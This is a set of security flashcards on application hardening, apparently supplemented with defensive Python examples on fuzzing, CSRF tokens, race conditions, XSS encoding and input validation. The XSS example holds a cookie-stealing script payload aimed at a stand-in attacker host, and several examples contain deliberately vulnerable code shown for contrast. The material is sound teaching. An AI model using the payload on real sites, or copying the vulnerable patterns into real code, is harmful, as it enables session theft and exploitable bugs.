4.4 Security Architecture and Tool Sets Flashcards
what is the purpose of filters on a web server?
they restrict which requests are allowed to reach the server (for example by source address, URL, HTTP method or content) and block the rest
what is the purpose of sandbox in a java applet?
it prevents java applets from accessing unauthorized areas on a user’s computer
which error condition arises because data is not checked before input to ensure that it has an appropriate length?
buffer overflow errors
when does fuzzing occur?
when unexpected values are provided as input to an application to make the application crash
what are the FIVE phases of the system development life cycle (SDLC)?
- initiation
- development and acquisition
- implementation and assessment
- operations and maintenance
- disposal
what is the purpose of a decompiler?
to re-create source code in a high-level language from a compiled binary, so the program's logic can be reviewed without the original sources
which type of attack runs code within another process’s address space by making it load a dynamic link library?
a DLL injection attack
what is the purpose of fuzz testing?
to identify bugs and security flaws within an application
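The two fuzzing cards above describe the technique in one sentence; the following is an added example (not part of the original flashcards) showing it in practice: a small mutation fuzzer aimed at a constructed length-prefixed record parser whose bug is exactly the unchecked length from the buffer-overflow card. The record format, the parser names and the seed input are all assumptions made for the example. Malformed input is supposed to raise ValueError; any other exception counts as a crash worth investigating.

```python
import random


def checksum(payload: bytes) -> int:
    return sum(payload) % 256


def parse_records_vulnerable(data: bytes) -> list[bytes]:
    """Parse a constructed format: [len][payload...][checksum], repeated.
    The declared length is never checked against the bytes remaining, so a
    corrupted length byte makes the checksum lookup read past the buffer."""
    records, i = [], 0
    while i < len(data):
        n = data[i]
        payload = data[i + 1:i + 1 + n]          # slicing silently truncates
        stored = data[i + 1 + n]                 # IndexError when n overruns
        if checksum(payload) != stored:
            raise ValueError("bad checksum")     # the only error we expect
        records.append(payload)
        i += 2 + n
    return records


def parse_records_hardened(data: bytes) -> list[bytes]:
    """Same parser with the missing length check added."""
    records, i = [], 0
    while i < len(data):
        n = data[i]
        if i + 1 + n >= len(data):               # length must fit the buffer
            raise ValueError("truncated record")
        payload = data[i + 1:i + 1 + n]
        if checksum(payload) != data[i + 1 + n]:
            raise ValueError("bad checksum")
        records.append(payload)
        i += 2 + n
    return records


def encode(records: list[bytes]) -> bytes:
    out = b""
    for r in records:
        out += bytes([len(r)]) + r + bytes([checksum(r)])
    return out


SEED_INPUT = encode([b"abc", b"xy"])   # a valid, constructed seed input


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Apply one random mutation to a copy of the seed input."""
    buf = bytearray(data)
    choice = rng.randrange(4)
    if choice == 0 and buf:                      # overwrite with a random byte
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif choice == 1 and buf:                    # force a boundary value
        buf[rng.randrange(len(buf))] = 0xFF
    elif choice == 2 and buf:                    # delete a byte
        del buf[rng.randrange(len(buf))]
    else:                                        # insert a random byte
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    return bytes(buf)


def fuzz(parser, iterations: int = 300, seed: int = 1) -> list[tuple[str, bytes]]:
    """Feed mutated inputs to parser and collect crashes: every exception
    other than the ValueError the parser uses to reject malformed input."""
    rng = random.Random(seed)       # fixed seed so a run is reproducible
    crashes = []
    for _ in range(iterations):
        case = mutate(SEED_INPUT, rng)
        try:
            parser(case)
        except ValueError:
            pass                    # expected rejection, not a bug
        except Exception as exc:
            crashes.append((type(exc).__name__, case))
    return crashes


if __name__ == "__main__":
    for parser in (parse_records_vulnerable, parse_records_hardened):
        found = fuzz(parser)
        print(f"{parser.__name__}: {len(found)} crashes", found[:1])
```

Real fuzzers (AFL, libFuzzer) add coverage feedback so mutations that reach new code are kept as new seeds; the crash-triage rule is the same: anything other than the documented rejection path is a finding.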
what are alternate terms for cross-site request forgery (XSRF)?
session riding or one-click attack
which application hardening method requires that your organization periodically checks with the application vendor?
patch management
what is the most significant misuse of cookies?
misuse of the personal data they store: cookies can be read or stolen (for example by a cross-site scripting attack) and used to track or impersonate the user
what does a race condition typically attack?
the delay between time of check (TOC) and time of use (TOU)
when does a cross-site scripting (XSS) attack occur?
it occurs when an attacker finds a web application that places untrusted input into its pages without encoding it, and uses that flaw to inject script that runs in other users' browsers
what is the name for a small piece of information that is saved on a client machine on the hard disk to enable tracking of user information on future web visits?
a cookie
what is the purpose of an application disassembler?
to translate a compiled program's machine code back into assembly language, so an analyst can read and understand the program's raw instructions
what is the purpose of a fail-safe error handler?
to ensure that when an error occurs the application stops processing, reports the error, and shuts down in a secure state rather than continuing in an unknown one
what is an application backdoor?
lines of code that are inserted into an application to allow developers to enter the application and bypass the security mechanisms
what is cross-site request forgery (XSRF)?
unauthorized commands transmitted from a user that the web site trusts: the attacker tricks an authenticated user's browser into sending a request the user did not intend (for example through a crafted link, image or form placed on another site, including social networking pages), and the browser attaches the victim's session cookie automatically
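The two XSRF cards above give the name and the definition; as an added example (not part of the original flashcards) here is the standard defense, a per-session anti-CSRF token that the server embeds in its own forms and checks on every state-changing request. The forged request carries the victim's session cookie, because the browser attaches it automatically, but the attacker's page cannot read the token, so the request is refused. The session store, the request shape and the endpoint name are constructed stand-ins for a real web framework.

```python
import hmac
import secrets

# Constructed in-memory session store keyed by the session cookie value.
SESSIONS: dict[str, dict] = {}


def login(user: str) -> str:
    """Create a session; the browser would receive this id as a cookie."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """Token the server embeds as a hidden field in its own forms."""
    return SESSIONS[sid]["csrf_token"]


def handle_transfer(request: dict) -> tuple[int, str]:
    """State-changing endpoint. `request` is a constructed stand-in for an
    HTTP request: a `cookies` dict and a `form` dict."""
    sid = request.get("cookies", {}).get("session")
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "not logged in"
    sent = request.get("form", {}).get("csrf_token", "")
    # compare_digest keeps the comparison constant-time so the token
    # cannot be guessed byte by byte from response timing.
    if not hmac.compare_digest(sent, session["csrf_token"]):
        return 403, "CSRF token missing or invalid"
    amount = request["form"]["amount"]
    return 200, f"transferred {amount} from {session['user']}"


def demo() -> tuple[tuple[int, str], tuple[int, str]]:
    sid = login("alice")
    # Legitimate request: the browser submits the server's own form,
    # which carries the token alongside the cookie.
    legit = {"cookies": {"session": sid},
             "form": {"amount": "100", "csrf_token": csrf_token_for(sid)}}
    # Forged request: the attacker's page auto-submits a form to the site.
    # The browser still sends alice's cookie, but the attacker never saw
    # her token, so the form lacks it.
    forged = {"cookies": {"session": sid},
              "form": {"amount": "100"}}
    return handle_transfer(legit), handle_transfer(forged)


if __name__ == "__main__":
    print(demo())
```

Setting the session cookie with the SameSite attribute is a complementary browser-side control; the token check remains the server-side one.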
what should application developers do to prevent race condition attack?
acquire exclusive locks on shared resources in a fixed, consistent order and release them in reverse order, and perform both the check and the use of a resource while holding its lock so the check cannot go stale
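The race-condition cards above (the TOC/TOU window and the locking rule) are easier to see in running code, so here is an added example that is not part of the original flashcards. It is a constructed bank-account scenario: a check-then-withdraw with nothing holding the balance steady between the check and the use, the same operation with check and use under one lock, and a two-account transfer that takes both locks in a fixed order and releases them in reverse. The small sleep is added deliberately to make the unsafe interleaving reproducible.

```python
import threading
import time


class Account:
    def __init__(self, acct_id: int, balance: int):
        self.id = acct_id
        self.balance = balance
        self.lock = threading.Lock()


def withdraw_racy(acct: Account, amount: int) -> None:
    """TOC/TOU bug: the balance is checked, then used later, and nothing
    stops a second thread from spending the same money in between."""
    if acct.balance >= amount:          # time of check
        time.sleep(0.1)                 # constructed delay to widen the window
        acct.balance -= amount          # time of use


def withdraw_safe(acct: Account, amount: int) -> bool:
    """Check and use happen under one lock, so the check cannot go stale."""
    with acct.lock:
        if acct.balance < amount:
            return False
        time.sleep(0.1)                 # same delay; the lock makes it harmless
        acct.balance -= amount
        return True


def transfer(src: Account, dst: Account, amount: int) -> bool:
    """Needs both locks. Always acquire in ascending account id and release
    in reverse, so two opposite transfers cannot deadlock by each holding
    one lock while waiting for the other."""
    first, second = sorted((src, dst), key=lambda a: a.id)
    with first.lock:
        with second.lock:               # released first on exit, then first.lock
            if src.balance < amount:
                return False
            src.balance -= amount
            dst.balance += amount
            return True


def run_threads(target, args_list) -> None:
    threads = [threading.Thread(target=target, args=a) for a in args_list]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


def demo_toctou(withdraw) -> int:
    """Two threads each try to withdraw the whole balance; return what is left."""
    acct = Account(1, 100)
    run_threads(withdraw, [(acct, 100), (acct, 100)])
    return acct.balance


def demo_transfers() -> int:
    """Fifty transfers each way at once; return the combined balance."""
    a, b = Account(1, 500), Account(2, 500)
    run_threads(transfer, [(a, b, 10)] * 50 + [(b, a, 10)] * 50)
    return a.balance + b.balance


if __name__ == "__main__":
    print("racy withdraw leaves:", demo_toctou(withdraw_racy))    # -100
    print("safe withdraw leaves:", demo_toctou(withdraw_safe))    # 0
    print("total after transfers:", demo_transfers())             # 1000
```

If `transfer` instead locked `src` then `dst`, the a-to-b and b-to-a threads would each hold one lock and wait forever for the other; ordering by id removes that possibility regardless of which direction a call is made in.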
what is the best protection against cross-site scripting? (XSS)?
from the user's side, disable the running of scripts in the browser; on the server side, validate input and encode untrusted data for the context (HTML, attribute, URL) it is written into
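The XSS cards above describe the injection and the defense; the following is an added example, not part of the original flashcards, showing the server-side half in code: a page fragment that interpolates user input verbatim, the same fragment with HTML encoding, and a link where the same value lands in two different contexts and needs two different encodings. The payload, the function names and the CSP value are assumptions made for the example.

```python
import html
from urllib.parse import quote

# A constructed stored-XSS payload: if it reaches the page unencoded, the
# browser runs it and ships the victim's cookie to the attacker's host.
PAYLOAD = "<script>location='https://attacker.example/?c='+document.cookie</script>"

# The "disable scripts" answer, expressed as a server header: with this
# Content-Security-Policy the browser refuses inline script entirely.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'")


def render_comment_vulnerable(name: str) -> str:
    """User input dropped straight into HTML: the classic XSS sink."""
    return f"<p>Comment by {name}</p>"


def render_comment_safe(name: str) -> str:
    """HTML-encode for the text-node context; <, >, &, quotes become entities."""
    return f"<p>Comment by {html.escape(name, quote=True)}</p>"


def render_profile_link(username: str) -> str:
    """One value, two contexts: percent-encode inside the URL path segment,
    HTML-encode inside the element body. Using one encoding for both is a
    common mistake."""
    return (f'<a href="/users/{quote(username, safe="")}">'
            f'{html.escape(username, quote=True)}</a>')


def contains_script_tag(markup: str) -> bool:
    """Crude check used only to show whether a tag survived encoding."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    print(render_profile_link('a"b'))
```

Encoding at output time, chosen per context, is what closes the hole; the CSP header limits the damage if a sink is missed. Input validation (see the last card) is a separate layer and does not replace either.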
what is the purpose of secure code review?
it examines all written code for any security holes that may exist
what is a cookie?
a small text file that a web server stores on the web client to hold persistent settings and session information for that server
what is the purpose of input validation?
to ensure that data entering an application (for example before it is stored in a database) conforms to the expected type, length, format and range, and to reject anything that does not
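To make the input-validation card concrete, here is an added example that is not part of the original flashcards: an allowlist validator for a constructed sign-up form (username pattern and length, numeric range for age, length and character class for a free-text field), followed by a parameterized insert into an in-memory SQLite table. The field rules, table and function names are assumptions chosen for the example; the point is that validation checks the parameters the card mentions, while the parameterized query separately keeps whatever does get stored from being interpreted as SQL.

```python
import re
import sqlite3

# Allowlist: say what is acceptable, rather than trying to blocklist bad input.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,20}")


def validate_signup(form: dict) -> list[str]:
    """Return a list of validation errors; an empty list means the form is clean."""
    errors = []

    username = form.get("username", "")
    if not isinstance(username, str) or not USERNAME_RE.fullmatch(username):
        errors.append("username: 3-20 letters, digits or underscores")

    age = form.get("age", "")
    # isascii() keeps isdigit() from accepting non-ASCII digit characters
    if not (isinstance(age, str) and age.isascii() and age.isdigit()
            and 13 <= int(age) <= 120):
        errors.append("age: whole number between 13 and 120")

    bio = form.get("bio", "")
    if (not isinstance(bio, str) or len(bio) > 280
            or any(ord(c) < 32 and c != "\n" for c in bio)):
        errors.append("bio: at most 280 characters, no control characters")

    return errors


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, "
                 "age INTEGER, bio TEXT)")
    return conn


def signup(conn: sqlite3.Connection, form: dict) -> list[str]:
    """Validate first; only clean data reaches the database, and it goes in
    through bound parameters, never by string concatenation."""
    errors = validate_signup(form)
    if errors:
        return errors
    conn.execute("INSERT INTO users (username, age, bio) VALUES (?, ?, ?)",
                 (form["username"], int(form["age"]), form.get("bio", "")))
    conn.commit()
    return []


def user_count(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


if __name__ == "__main__":
    db = open_db()
    print(signup(db, {"username": "alice_1", "age": "30", "bio": "hi"}))
    print(signup(db, {"username": "x' OR '1'='1", "age": "-5", "bio": "a\x00b"}))
    print(user_count(db))
```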